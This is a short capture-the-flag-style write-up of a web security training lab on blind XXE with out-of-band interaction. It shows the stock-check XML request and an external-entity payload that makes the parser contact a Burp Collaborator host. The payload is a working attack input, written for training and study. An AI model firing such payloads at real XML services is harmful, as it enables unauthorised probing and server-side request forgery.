Blind XXE with out of band interaction

Description

This lab has a "Check stock" feature that parses XML input but does not display the result.

You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.

To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

Approach

After accessing the lab, I noticed a POST request sending XML data to the backend:

POST /product/stock HTTP/2
Host: 0a570048043caf7c81360333000b0063.web-security-academy.net
Cookie: session=bsdP3bHoQNLt82EtJQpWD4CaYWkpmonQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 ...

<?xml version="1.0" encoding="UTF-8"?>
	<stockCheck>
		<productId>1</productId>
		<storeId>3</storeId>
	</stockCheck>

My initial attempt to exploit XXE by fetching local files failed. Since I had no knowledge of other backend systems, I decided to try out-of-band interaction by reaching my Burp Collaborator. I crafted a simple payload using my Burp Collaborator URL:

<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://7s0ammq9uf5jhfq2st82gtjca3gu4ks9.oastify.com"> ]>
	<stockCheck>
		<productId>&xxe;</productId>
		<storeId>1</storeId>
	</stockCheck>

After sending this request and polling Burp Collaborator, I observed multiple DNS lookup requests. This successful interaction confirmed the exploit, and the lab was solved.

PreviousExploiting XXE to perform SSRF attacks NextBlind XXE with out of band interaction via XML parameter entities